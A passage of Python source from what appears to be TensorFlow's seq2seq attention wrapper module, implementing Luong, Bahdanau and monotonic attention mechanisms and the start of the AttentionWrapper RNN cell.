class _BaseAttentionMechanism(AttentionMechanism):
"""A base AttentionMechanism class providing common functionality.
Common functionality includes:
1. Storing the query and memory layers.
2. Preprocessing and storing the memory.
"""
def __init__(self,
query_layer,
memory,
probability_fn,
memory_sequence_length=None,
memory_layer=None,
check_inner_dims_defined=True,
score_mask_value=None,
name=None):
"""Construct base AttentionMechanism class.
Args:
query_layer: Callable. Instance of `tf.layers.Layer`. The layer's depth
must match the depth of `memory_layer`. If `query_layer` is not
provided, the shape of `query` must match that of `memory_layer`.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
probability_fn: A `callable`. Converts the score and previous alignments
to probabilities. Its signature should be:
`probabilities = probability_fn(score, state)`.
memory_sequence_length (optional): Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
memory_layer: Instance of `tf.layers.Layer` (may be None). The layer's
depth must match the depth of `query_layer`.
If `memory_layer` is not provided, the shape of `memory` must match
that of `query_layer`.
check_inner_dims_defined: Python boolean. If `True`, the `memory`
argument's shape is checked to ensure all but the two outermost
dimensions are fully defined.
score_mask_value: (optional): The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
name: Name to use when creating ops.
"""
if (query_layer is not None
and not isinstance(query_layer, layers_base.Layer)):
raise TypeError(
"query_layer is not a Layer: %s" % type(query_layer).__name__)
if (memory_layer is not None
and not isinstance(memory_layer, layers_base.Layer)):
raise TypeError(
"memory_layer is not a Layer: %s" % type(memory_layer).__name__)
self._query_layer = query_layer
self._memory_layer = memory_layer
self.dtype = memory_layer.dtype
if not callable(probability_fn):
raise TypeError("probability_fn must be callable, saw type: %s" %
type(probability_fn).__name__)
if score_mask_value is None:
score_mask_value = dtypes.as_dtype(
self._memory_layer.dtype).as_numpy_dtype(-np.inf)
self._probability_fn = lambda score, prev: ( # pylint:disable=g-long-lambda
probability_fn(
_maybe_mask_score(score, memory_sequence_length, score_mask_value),
prev))
with ops.name_scope(
name, "BaseAttentionMechanismInit", nest.flatten(memory)):
self._values = _prepare_memory(
memory, memory_sequence_length,
check_inner_dims_defined=check_inner_dims_defined)
self._keys = (
self.memory_layer(self._values) if self.memory_layer # pylint: disable=not-callable
else self._values)
self._batch_size = (
self._keys.shape[0].value or array_ops.shape(self._keys)[0])
self._alignments_size = (self._keys.shape[1].value or
array_ops.shape(self._keys)[1])
@property
def memory_layer(self):
return self._memory_layer
@property
def query_layer(self):
return self._query_layer
@property
def values(self):
return self._values
@property
def keys(self):
return self._keys
@property
def batch_size(self):
return self._batch_size
@property
def alignments_size(self):
return self._alignments_size
@property
def state_size(self):
return self._alignments_size
def initial_alignments(self, batch_size, dtype):
"""Creates the initial alignment values for the `AttentionWrapper` class.
This is important for AttentionMechanisms that use the previous alignment
to calculate the alignment at the next time step (e.g. monotonic attention).
The default behavior is to return a tensor of all zeros.
Args:
batch_size: `int32` scalar, the batch_size.
dtype: The `dtype`.
Returns:
A `dtype` tensor shaped `[batch_size, alignments_size]`
(`alignments_size` is the values' `max_time`).
"""
max_time = self._alignments_size
return _zero_state_tensors(max_time, batch_size, dtype)
def initial_state(self, batch_size, dtype):
"""Creates the initial state values for the `AttentionWrapper` class.
This is important for AttentionMechanisms that use the previous alignment
to calculate the alignment at the next time step (e.g. monotonic attention).
The default behavior is to return the same output as initial_alignments.
Args:
batch_size: `int32` scalar, the batch_size.
dtype: The `dtype`.
Returns:
A structure of all-zero tensors with shapes as described by `state_size`.
"""
return self.initial_alignments(batch_size, dtype)
def _luong_score(query, keys, scale):
"""Implements Luong-style (multiplicative) scoring function.
This attention has two forms. The first is standard Luong attention,
as described in:
Minh-Thang Luong, Hieu Pham, Christopher D. Manning.
"Effective Approaches to Attention-based Neural Machine Translation."
EMNLP 2015. https://arxiv.org/abs/1508.04025
The second is the scaled form inspired partly by the normalized form of
Bahdanau attention.
To enable the second form, call this function with `scale=True`.
Args:
query: Tensor, shape `[batch_size, num_units]` to compare to keys.
keys: Processed memory, shape `[batch_size, max_time, num_units]`.
scale: Whether to apply a scale to the score function.
Returns:
A `[batch_size, max_time]` tensor of unnormalized score values.
Raises:
ValueError: If `key` and `query` depths do not match.
"""
depth = query.get_shape()[-1]
key_units = keys.get_shape()[-1]
if depth != key_units:
raise ValueError(
"Incompatible or unknown inner dimensions between query and keys. "
"Query (%s) has units: %s. Keys (%s) have units: %s. "
"Perhaps you need to set num_units to the keys' dimension (%s)?"
% (query, depth, keys, key_units, key_units))
dtype = query.dtype
# Reshape from [batch_size, depth] to [batch_size, 1, depth]
# for matmul.
query = array_ops.expand_dims(query, 1)
# Inner product along the query units dimension.
# matmul shapes: query is [batch_size, 1, depth] and
# keys is [batch_size, max_time, depth].
# the inner product is asked to **transpose keys' inner shape** to get a
# batched matmul on:
# [batch_size, 1, depth] . [batch_size, depth, max_time]
# resulting in an output shape of:
# [batch_size, 1, max_time].
# we then squeeze out the center singleton dimension.
score = math_ops.matmul(query, keys, transpose_b=True)
score = array_ops.squeeze(score, [1])
if scale:
# Scalar used in weight scaling
g = variable_scope.get_variable(
"attention_g", dtype=dtype, initializer=1.)
score = g * score
return score
class LuongAttention(_BaseAttentionMechanism):
"""Implements Luong-style (multiplicative) attention scoring.
This attention has two forms. The first is standard Luong attention,
as described in:
Minh-Thang Luong, Hieu Pham, Christopher D. Manning.
"Effective Approaches to Attention-based Neural Machine Translation."
EMNLP 2015. https://arxiv.org/abs/1508.04025
The second is the scaled form inspired partly by the normalized form of
Bahdanau attention.
To enable the second form, construct the object with parameter
`scale=True`.
"""
def __init__(self,
num_units,
memory,
memory_sequence_length=None,
scale=False,
probability_fn=None,
score_mask_value=None,
dtype=None,
name="LuongAttention"):
"""Construct the AttentionMechanism mechanism.
Args:
num_units: The depth of the attention mechanism.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
memory_sequence_length: (optional) Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
scale: Python boolean. Whether to scale the energy term.
probability_fn: (optional) A `callable`. Converts the score to
probabilities. The default is @{tf.nn.softmax}. Other options include
@{tf.contrib.seq2seq.hardmax} and @{tf.contrib.sparsemax.sparsemax}.
Its signature should be: `probabilities = probability_fn(score)`.
score_mask_value: (optional) The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
dtype: The data type for the memory layer of the attention mechanism.
name: Name to use when creating ops.
"""
# For LuongAttention, we only transform the memory layer; thus
# num_units **must** match expected the query depth.
if probability_fn is None:
probability_fn = nn_ops.softmax
if dtype is None:
dtype = dtypes.float32
wrapped_probability_fn = lambda score, _: probability_fn(score)
super(LuongAttention, self).__init__(
query_layer=None,
memory_layer=layers_core.Dense(
num_units, name="memory_layer", use_bias=False, dtype=dtype),
memory=memory,
probability_fn=wrapped_probability_fn,
memory_sequence_length=memory_sequence_length,
score_mask_value=score_mask_value,
name=name)
self._num_units = num_units
self._scale = scale
self._name = name
def __call__(self, query, state):
"""Score the query based on the keys and values.
Args:
query: Tensor of dtype matching `self.values` and shape
`[batch_size, query_depth]`.
state: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]`
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
with variable_scope.variable_scope(None, "luong_attention", [query]):
score = _luong_score(query, self._keys, self._scale)
alignments = self._probability_fn(score, state)
next_state = alignments
return alignments, next_state
def _bahdanau_score(processed_query, keys, normalize):
"""Implements Bahdanau-style (additive) scoring function.
This attention has two forms. The first is Bhandanau attention,
as described in:
Dzmitry Bahdanau, Kyunghyun Cho, Yoshua Bengio.
"Neural Machine Translation by Jointly Learning to Align and Translate."
ICLR 2015. https://arxiv.org/abs/1409.0473
The second is the normalized form. This form is inspired by the
weight normalization article:
Tim Salimans, Diederik P. Kingma.
"Weight Normalization: A Simple Reparameterization to Accelerate
Training of Deep Neural Networks."
https://arxiv.org/abs/1602.07868
To enable the second form, set `normalize=True`.
Args:
processed_query: Tensor, shape `[batch_size, num_units]` to compare to keys.
keys: Processed memory, shape `[batch_size, max_time, num_units]`.
normalize: Whether to normalize the score function.
Returns:
A `[batch_size, max_time]` tensor of unnormalized score values.
"""
dtype = processed_query.dtype
# Get the number of hidden units from the trailing dimension of keys
num_units = keys.shape[2].value or array_ops.shape(keys)[2]
# Reshape from [batch_size, ...] to [batch_size, 1, ...] for broadcasting.
processed_query = array_ops.expand_dims(processed_query, 1)
v = variable_scope.get_variable(
"attention_v", [num_units], dtype=dtype)
if normalize:
# Scalar used in weight normalization
g = variable_scope.get_variable(
"attention_g", dtype=dtype,
initializer=math.sqrt((1. / num_units)))
# Bias added prior to the nonlinearity
b = variable_scope.get_variable(
"attention_b", [num_units], dtype=dtype,
initializer=init_ops.zeros_initializer())
# normed_v = g * v / ||v||
normed_v = g * v * math_ops.rsqrt(
math_ops.reduce_sum(math_ops.square(v)))
return math_ops.reduce_sum(
normed_v * math_ops.tanh(keys + processed_query + b), [2])
else:
return math_ops.reduce_sum(v * math_ops.tanh(keys + processed_query), [2])
class BahdanauAttention(_BaseAttentionMechanism):
"""Implements Bahdanau-style (additive) attention.
This attention has two forms. The first is Bahdanau attention,
as described in:
Dzmitry Bahdanau, Kyunghyun Cho, Yoshua Bengio.
"Neural Machine Translation by Jointly Learning to Align and Translate."
ICLR 2015. https://arxiv.org/abs/1409.0473
The second is the normalized form. This form is inspired by the
weight normalization article:
Tim Salimans, Diederik P. Kingma.
"Weight Normalization: A Simple Reparameterization to Accelerate
Training of Deep Neural Networks."
https://arxiv.org/abs/1602.07868
To enable the second form, construct the object with parameter
`normalize=True`.
"""
def __init__(self,
num_units,
memory,
memory_sequence_length=None,
normalize=False,
probability_fn=None,
score_mask_value=None,
dtype=None,
name="BahdanauAttention"):
"""Construct the Attention mechanism.
Args:
num_units: The depth of the query mechanism.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
memory_sequence_length (optional): Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
normalize: Python boolean. Whether to normalize the energy term.
probability_fn: (optional) A `callable`. Converts the score to
probabilities. The default is @{tf.nn.softmax}. Other options include
@{tf.contrib.seq2seq.hardmax} and @{tf.contrib.sparsemax.sparsemax}.
Its signature should be: `probabilities = probability_fn(score)`.
score_mask_value: (optional): The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
dtype: The data type for the query and memory layers of the attention
mechanism.
name: Name to use when creating ops.
"""
if probability_fn is None:
probability_fn = nn_ops.softmax
if dtype is None:
dtype = dtypes.float32
wrapped_probability_fn = lambda score, _: probability_fn(score)
super(BahdanauAttention, self).__init__(
query_layer=layers_core.Dense(
num_units, name="query_layer", use_bias=False, dtype=dtype),
memory_layer=layers_core.Dense(
num_units, name="memory_layer", use_bias=False, dtype=dtype),
memory=memory,
probability_fn=wrapped_probability_fn,
memory_sequence_length=memory_sequence_length,
score_mask_value=score_mask_value,
name=name)
self._num_units = num_units
self._normalize = normalize
self._name = name
def __call__(self, query, state):
"""Score the query based on the keys and values.
Args:
query: Tensor of dtype matching `self.values` and shape
`[batch_size, query_depth]`.
state: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]`
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
with variable_scope.variable_scope(None, "bahdanau_attention", [query]):
processed_query = self.query_layer(query) if self.query_layer else query
score = _bahdanau_score(processed_query, self._keys, self._normalize)
alignments = self._probability_fn(score, state)
next_state = alignments
return alignments, next_state
def safe_cumprod(x, *args, **kwargs):
"""Computes cumprod of x in logspace using cumsum to avoid underflow.
The cumprod function and its gradient can result in numerical instabilities
when its argument has very small and/or zero values. As long as the argument
is all positive, we can instead compute the cumulative product as
exp(cumsum(log(x))). This function can be called identically to tf.cumprod.
Args:
x: Tensor to take the cumulative product of.
*args: Passed on to cumsum; these are identical to those in cumprod.
**kwargs: Passed on to cumsum; these are identical to those in cumprod.
Returns:
Cumulative product of x.
"""
with ops.name_scope(None, "SafeCumprod", [x]):
x = ops.convert_to_tensor(x, name="x")
tiny = np.finfo(x.dtype.as_numpy_dtype).tiny
return math_ops.exp(math_ops.cumsum(
math_ops.log(clip_ops.clip_by_value(x, tiny, 1)), *args, **kwargs))
def monotonic_attention(p_choose_i, previous_attention, mode):
"""Compute monotonic attention distribution from choosing probabilities.
Monotonic attention implies that the input sequence is processed in an
explicitly left-to-right manner when generating the output sequence. In
addition, once an input sequence element is attended to at a given output
timestep, elements occurring before it cannot be attended to at subsequent
output timesteps. This function generates attention distributions according
to these assumptions. For more information, see ``Online and Linear-Time
Attention by Enforcing Monotonic Alignments''.
Args:
p_choose_i: Probability of choosing input sequence/memory element i. Should
be of shape (batch_size, input_sequence_length), and should all be in the
range [0, 1].
previous_attention: The attention distribution from the previous output
timestep. Should be of shape (batch_size, input_sequence_length). For
the first output timestep, preevious_attention[n] should be [1, 0, 0, ...,
0] for all n in [0, ... batch_size - 1].
mode: How to compute the attention distribution. Must be one of
'recursive', 'parallel', or 'hard'.
* 'recursive' uses tf.scan to recursively compute the distribution.
This is slowest but is exact, general, and does not suffer from
numerical instabilities.
* 'parallel' uses parallelized cumulative-sum and cumulative-product
operations to compute a closed-form solution to the recurrence
relation defining the attention distribution. This makes it more
efficient than 'recursive', but it requires numerical checks which
make the distribution non-exact. This can be a problem in particular
when input_sequence_length is long and/or p_choose_i has entries very
close to 0 or 1.
* 'hard' requires that the probabilities in p_choose_i are all either 0
or 1, and subsequently uses a more efficient and exact solution.
Returns:
A tensor of shape (batch_size, input_sequence_length) representing the
attention distributions for each sequence in the batch.
Raises:
ValueError: mode is not one of 'recursive', 'parallel', 'hard'.
"""
# Force things to be tensors
p_choose_i = ops.convert_to_tensor(p_choose_i, name="p_choose_i")
previous_attention = ops.convert_to_tensor(
previous_attention, name="previous_attention")
if mode == "recursive":
# Use .shape[0].value when it's not None, or fall back on symbolic shape
batch_size = p_choose_i.shape[0].value or array_ops.shape(p_choose_i)[0]
# Compute [1, 1 - p_choose_i[0], 1 - p_choose_i[1], ..., 1 - p_choose_i[-2]]
shifted_1mp_choose_i = array_ops.concat(
[array_ops.ones((batch_size, 1)), 1 - p_choose_i[:, :-1]], 1)
# Compute attention distribution recursively as
# q[i] = (1 - p_choose_i[i])*q[i - 1] + previous_attention[i]
# attention[i] = p_choose_i[i]*q[i]
attention = p_choose_i*array_ops.transpose(functional_ops.scan(
# Need to use reshape to remind TF of the shape between loop iterations
lambda x, yz: array_ops.reshape(yz[0]*x + yz[1], (batch_size,)),
# Loop variables yz[0] and yz[1]
[array_ops.transpose(shifted_1mp_choose_i),
array_ops.transpose(previous_attention)],
# Initial value of x is just zeros
array_ops.zeros((batch_size,))))
elif mode == "parallel":
# safe_cumprod computes cumprod in logspace with numeric checks
cumprod_1mp_choose_i = safe_cumprod(1 - p_choose_i, axis=1, exclusive=True)
# Compute recurrence relation solution
attention = p_choose_i*cumprod_1mp_choose_i*math_ops.cumsum(
previous_attention /
# Clip cumprod_1mp to avoid divide-by-zero
clip_ops.clip_by_value(cumprod_1mp_choose_i, 1e-10, 1.), axis=1)
elif mode == "hard":
# Remove any probabilities before the index chosen last time step
p_choose_i *= math_ops.cumsum(previous_attention, axis=1)
# Now, use exclusive cumprod to remove probabilities after the first
# chosen index, like so:
# p_choose_i = [0, 0, 0, 1, 1, 0, 1, 1]
# cumprod(1 - p_choose_i, exclusive=True) = [1, 1, 1, 1, 0, 0, 0, 0]
# Product of above: [0, 0, 0, 1, 0, 0, 0, 0]
attention = p_choose_i*math_ops.cumprod(
1 - p_choose_i, axis=1, exclusive=True)
else:
raise ValueError("mode must be 'recursive', 'parallel', or 'hard'.")
return attention
def _monotonic_probability_fn(score, previous_alignments, sigmoid_noise, mode,
seed=None):
"""Attention probability function for monotonic attention.
Takes in unnormalized attention scores, adds pre-sigmoid noise to encourage
the model to make discrete attention decisions, passes them through a sigmoid
to obtain "choosing" probabilities, and then calls monotonic_attention to
obtain the attention distribution. For more information, see
Colin Raffel, Minh-Thang Luong, Peter J. Liu, Ron J. Weiss, Douglas Eck,
"Online and Linear-Time Attention by Enforcing Monotonic Alignments."
ICML 2017. https://arxiv.org/abs/1704.00784
Args:
score: Unnormalized attention scores, shape `[batch_size, alignments_size]`
previous_alignments: Previous attention distribution, shape
`[batch_size, alignments_size]`
sigmoid_noise: Standard deviation of pre-sigmoid noise. Setting this larger
than 0 will encourage the model to produce large attention scores,
effectively making the choosing probabilities discrete and the resulting
attention distribution one-hot. It should be set to 0 at test-time, and
when hard attention is not desired.
mode: How to compute the attention distribution. Must be one of
'recursive', 'parallel', or 'hard'. See the docstring for
`tf.contrib.seq2seq.monotonic_attention` for more information.
seed: (optional) Random seed for pre-sigmoid noise.
Returns:
A `[batch_size, alignments_size]`-shape tensor corresponding to the
resulting attention distribution.
"""
# Optionally add pre-sigmoid noise to the scores
if sigmoid_noise > 0:
noise = random_ops.random_normal(array_ops.shape(score), dtype=score.dtype,
seed=seed)
score += sigmoid_noise*noise
# Compute "choosing" probabilities from the attention scores
if mode == "hard":
# When mode is hard, use a hard sigmoid
p_choose_i = math_ops.cast(score > 0, score.dtype)
else:
p_choose_i = math_ops.sigmoid(score)
# Convert from choosing probabilities to attention distribution
return monotonic_attention(p_choose_i, previous_alignments, mode)
class _BaseMonotonicAttentionMechanism(_BaseAttentionMechanism):
"""Base attention mechanism for monotonic attention.
Simply overrides the initial_alignments function to provide a dirac
distribution,which is needed in order for the monotonic attention
distributions to have the correct behavior.
"""
def initial_alignments(self, batch_size, dtype):
"""Creates the initial alignment values for the monotonic attentions.
Initializes to dirac distributions, i.e. [1, 0, 0, ...memory length..., 0]
for all entries in the batch.
Args:
batch_size: `int32` scalar, the batch_size.
dtype: The `dtype`.
Returns:
A `dtype` tensor shaped `[batch_size, alignments_size]`
(`alignments_size` is the values' `max_time`).
"""
max_time = self._alignments_size
return array_ops.one_hot(
array_ops.zeros((batch_size,), dtype=dtypes.int32), max_time,
dtype=dtype)
class BahdanauMonotonicAttention(_BaseMonotonicAttentionMechanism):
"""Monotonic attention mechanism with Bahadanau-style energy function.
This type of attention encorces a monotonic constraint on the attention
distributions; that is once the model attends to a given point in the memory
it can't attend to any prior points at subsequence output timesteps. It
achieves this by using the _monotonic_probability_fn instead of softmax to
construct its attention distributions. Since the attention scores are passed
through a sigmoid, a learnable scalar bias parameter is applied after the
score function and before the sigmoid. Otherwise, it is equivalent to
BahdanauAttention. This approach is proposed in
Colin Raffel, Minh-Thang Luong, Peter J. Liu, Ron J. Weiss, Douglas Eck,
"Online and Linear-Time Attention by Enforcing Monotonic Alignments."
ICML 2017. https://arxiv.org/abs/1704.00784
"""
def __init__(self,
num_units,
memory,
memory_sequence_length=None,
normalize=False,
score_mask_value=None,
sigmoid_noise=0.,
sigmoid_noise_seed=None,
score_bias_init=0.,
mode="parallel",
dtype=None,
name="BahdanauMonotonicAttention"):
"""Construct the Attention mechanism.
Args:
num_units: The depth of the query mechanism.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
memory_sequence_length (optional): Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
normalize: Python boolean. Whether to normalize the energy term.
score_mask_value: (optional): The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
sigmoid_noise: Standard deviation of pre-sigmoid noise. See the docstring
for `_monotonic_probability_fn` for more information.
sigmoid_noise_seed: (optional) Random seed for pre-sigmoid noise.
score_bias_init: Initial value for score bias scalar. It's recommended to
initialize this to a negative value when the length of the memory is
large.
mode: How to compute the attention distribution. Must be one of
'recursive', 'parallel', or 'hard'. See the docstring for
`tf.contrib.seq2seq.monotonic_attention` for more information.
dtype: The data type for the query and memory layers of the attention
mechanism.
name: Name to use when creating ops.
"""
# Set up the monotonic probability fn with supplied parameters
if dtype is None:
dtype = dtypes.float32
wrapped_probability_fn = functools.partial(
_monotonic_probability_fn, sigmoid_noise=sigmoid_noise, mode=mode,
seed=sigmoid_noise_seed)
super(BahdanauMonotonicAttention, self).__init__(
query_layer=layers_core.Dense(
num_units, name="query_layer", use_bias=False, dtype=dtype),
memory_layer=layers_core.Dense(
num_units, name="memory_layer", use_bias=False, dtype=dtype),
memory=memory,
probability_fn=wrapped_probability_fn,
memory_sequence_length=memory_sequence_length,
score_mask_value=score_mask_value,
name=name)
self._num_units = num_units
self._normalize = normalize
self._name = name
self._score_bias_init = score_bias_init
def __call__(self, query, state):
"""Score the query based on the keys and values.
Args:
query: Tensor of dtype matching `self.values` and shape
`[batch_size, query_depth]`.
state: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]`
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
with variable_scope.variable_scope(
None, "bahdanau_monotonic_attention", [query]):
processed_query = self.query_layer(query) if self.query_layer else query
score = _bahdanau_score(processed_query, self._keys, self._normalize)
score_bias = variable_scope.get_variable(
"attention_score_bias", dtype=processed_query.dtype,
initializer=self._score_bias_init)
score += score_bias
alignments = self._probability_fn(score, state)
next_state = alignments
return alignments, next_state
class LuongMonotonicAttention(_BaseMonotonicAttentionMechanism):
"""Monotonic attention mechanism with Luong-style energy function.
This type of attention encorces a monotonic constraint on the attention
distributions; that is once the model attends to a given point in the memory
it can't attend to any prior points at subsequence output timesteps. It
achieves this by using the _monotonic_probability_fn instead of softmax to
construct its attention distributions. Otherwise, it is equivalent to
LuongAttention. This approach is proposed in
Colin Raffel, Minh-Thang Luong, Peter J. Liu, Ron J. Weiss, Douglas Eck,
"Online and Linear-Time Attention by Enforcing Monotonic Alignments."
ICML 2017. https://arxiv.org/abs/1704.00784
"""
def __init__(self,
num_units,
memory,
memory_sequence_length=None,
scale=False,
score_mask_value=None,
sigmoid_noise=0.,
sigmoid_noise_seed=None,
score_bias_init=0.,
mode="parallel",
dtype=None,
name="LuongMonotonicAttention"):
"""Construct the Attention mechanism.
Args:
num_units: The depth of the query mechanism.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
memory_sequence_length (optional): Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
scale: Python boolean. Whether to scale the energy term.
score_mask_value: (optional): The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
sigmoid_noise: Standard deviation of pre-sigmoid noise. See the docstring
for `_monotonic_probability_fn` for more information.
sigmoid_noise_seed: (optional) Random seed for pre-sigmoid noise.
score_bias_init: Initial value for score bias scalar. It's recommended to
initialize this to a negative value when the length of the memory is
large.
mode: How to compute the attention distribution. Must be one of
'recursive', 'parallel', or 'hard'. See the docstring for
`tf.contrib.seq2seq.monotonic_attention` for more information.
dtype: The data type for the query and memory layers of the attention
mechanism.
name: Name to use when creating ops.
"""
# Set up the monotonic probability fn with supplied parameters
if dtype is None:
dtype = dtypes.float32
wrapped_probability_fn = functools.partial(
_monotonic_probability_fn, sigmoid_noise=sigmoid_noise, mode=mode,
seed=sigmoid_noise_seed)
super(LuongMonotonicAttention, self).__init__(
query_layer=None,
memory_layer=layers_core.Dense(
num_units, name="memory_layer", use_bias=False, dtype=dtype),
memory=memory,
probability_fn=wrapped_probability_fn,
memory_sequence_length=memory_sequence_length,
score_mask_value=score_mask_value,
name=name)
self._num_units = num_units
self._scale = scale
self._score_bias_init = score_bias_init
self._name = name
def __call__(self, query, state):
"""Score the query based on the keys and values.
Args:
query: Tensor of dtype matching `self.values` and shape
`[batch_size, query_depth]`.
state: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]`
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
with variable_scope.variable_scope(None, "luong_monotonic_attention",
[query]):
score = _luong_score(query, self._keys, self._scale)
score_bias = variable_scope.get_variable(
"attention_score_bias", dtype=query.dtype,
initializer=self._score_bias_init)
score += score_bias
alignments = self._probability_fn(score, state)
next_state = alignments
return alignments, next_state
class AttentionWrapperState(
collections.namedtuple("AttentionWrapperState",
("cell_state", "attention", "time", "alignments",
"alignment_history", "attention_state"))):
"""`namedtuple` storing the state of a `AttentionWrapper`.
Contains:
- `cell_state`: The state of the wrapped `RNNCell` at the previous time
step.
- `attention`: The attention emitted at the previous time step.
- `time`: int32 scalar containing the current time step.
- `alignments`: A single or tuple of `Tensor`(s) containing the alignments
emitted at the previous time step for each attention mechanism.
- `alignment_history`: (if enabled) a single or tuple of `TensorArray`(s)
containing alignment matrices from all time steps for each attention
mechanism. Call `stack()` on each to convert to a `Tensor`.
- `attention_state`: A single or tuple of nested objects
containing attention mechanism state for each attention mechanism.
The objects may contain Tensors or TensorArrays.
"""
def clone(self, **kwargs):
"""Clone this object, overriding components provided by kwargs.
The new state fields' shape must match original state fields' shape. This
will be validated, and original fields' shape will be propagated to new
fields.
Example:
```python
initial_state = attention_wrapper.zero_state(dtype=..., batch_size=...)
initial_state = initial_state.clone(cell_state=encoder_state)
```
Args:
**kwargs: Any properties of the state object to replace in the returned
`AttentionWrapperState`.
Returns:
A new `AttentionWrapperState` whose properties are the same as
this one, except any overridden properties as provided in `kwargs`.
"""
def with_same_shape(old, new):
"""Check and set new tensor's shape."""
if isinstance(old, ops.Tensor) and isinstance(new, ops.Tensor):
return tensor_util.with_same_shape(old, new)
return new
return nest.map_structure(
with_same_shape,
self,
super(AttentionWrapperState, self)._replace(**kwargs))
def hardmax(logits, name=None):
"""Returns batched one-hot vectors.
The depth index containing the `1` is that of the maximum logit value.
Args:
logits: A batch tensor of logit values.
name: Name to use when creating ops.
Returns:
A batched one-hot tensor.
"""
with ops.name_scope(name, "Hardmax", [logits]):
logits = ops.convert_to_tensor(logits, name="logits")
if logits.get_shape()[-1].value is not None:
depth = logits.get_shape()[-1].value
else:
depth = array_ops.shape(logits)[-1]
return array_ops.one_hot(
math_ops.argmax(logits, -1), depth, dtype=logits.dtype)
def _compute_attention(attention_mechanism, cell_output, attention_state,
attention_layer):
"""Computes the attention and alignments for a given attention_mechanism."""
alignments, next_attention_state = attention_mechanism(
cell_output, state=attention_state)
# Reshape from [batch_size, memory_time] to [batch_size, 1, memory_time]
expanded_alignments = array_ops.expand_dims(alignments, 1)
# Context is the inner product of alignments and values along the
# memory time dimension.
# alignments shape is
# [batch_size, 1, memory_time]
# attention_mechanism.values shape is
# [batch_size, memory_time, memory_size]
# the batched matmul is over memory_time, so the output shape is
# [batch_size, 1, memory_size].
# we then squeeze out the singleton dim.
context = math_ops.matmul(expanded_alignments, attention_mechanism.values)
context = array_ops.squeeze(context, [1])
if attention_layer is not None:
attention = attention_layer(array_ops.concat([cell_output, context], 1))
else:
attention = context
return attention, alignments, next_attention_state
class AttentionWrapper(rnn_cell_impl.RNNCell):
"""Wraps another `RNNCell` with attention.
"""
def __init__(self,
cell,
attention_mechanism,
attention_layer_size=None,
alignment_history=False,
cell_input_fn=None,
output_attention=True,
initial_cell_state=None,
name=None):
"""Construct the `AttentionWrapper`.
**NOTE** If you are using the `BeamSearchDecoder` with a cell wrapped in
`AttentionWrapper`, then you must ensure that:
- The encoder output has been tiled to `beam_width` via
@{tf.contrib.seq2seq.tile_batch} (NOT `tf.tile`).
- The `batch_size` argument passed to the `zero_state` method of this
wrapper is equal to `true_batch_size * beam_width`.
- The initial state created with `zero_state` above contains a
`cell_state` value containing properly tiled final state from the
encoder.
An example:
```
tiled_encoder_outputs = tf.contrib.seq2seq.tile_batch(
encoder_outputs, multiplier=beam_width)
tiled_encoder_final_state = tf.conrib.seq2seq.tile_batch(
encoder_final_state, multiplier=beam_width)
tiled_sequence_length = tf.contrib.seq2seq.tile_batch(
sequence_length, multiplier=beam_width)
attention_mechanism = MyFavoriteAttentionMechanism(
num_units=attention_depth,
memory=tiled_inputs,
memory_sequence_length=tiled_sequence_length)
attention_cell = AttentionWrapper(cell, attention_mechanism, ...)
decoder_initial_state = attention_cell.zero_state(
dtype, batch_size=true_batch_size * beam_width)
decoder_initial_state = decoder_initial_state.clone(
cell_state=tiled_encoder_final_state)
```
Args:
cell: An instance of `RNNCell`.
attention_mechanism: A list of `AttentionMechanism` instances or a single
instance.
attention_layer_size: A list of Python integers or a single Python
integer, the depth of the attention (output) layer(s). If None
(default), use the context as attention at each time step. Otherwise,
feed the context and cell output into the attention layer to generate
attention at each time step. If attention_mechanism is a list,
attention_layer_size must be a list of the same length.
alignment_history: Python boolean, whether to store alignment history
from all time steps in the final output state (currently stored as a
time major `TensorArray` on which you must call `stack()`).
cell_input_fn: (optional) A `callable`. The default is:
`lambda inputs, attention: array_ops.concat([inputs, attention], -1)`.
output_attention: Python bool. If `True` (default), the output at each
time step is the attention value. This is the behavior of Luong-style
attention mechanisms. If `False`, the output at each time step is
the output of `cell`. This is the beahvior of Bhadanau-style
attention mechanisms. In both cases, the `attention` tensor is
propagated to the next time step via the state and is used there.
This flag only controls whether the attention mechanism is propagated
up to the next cell in an RNN stack or to the top RNN output.
initial_cell_state: The initial state value to use for the cell when
the user calls `zero_state()`. Note that if this value is provided
now, and the user uses a `batch_size` argument of `zero_state` which
does not match the batch size of `initial_cell_state`, proper
behavior is not guaranteed.
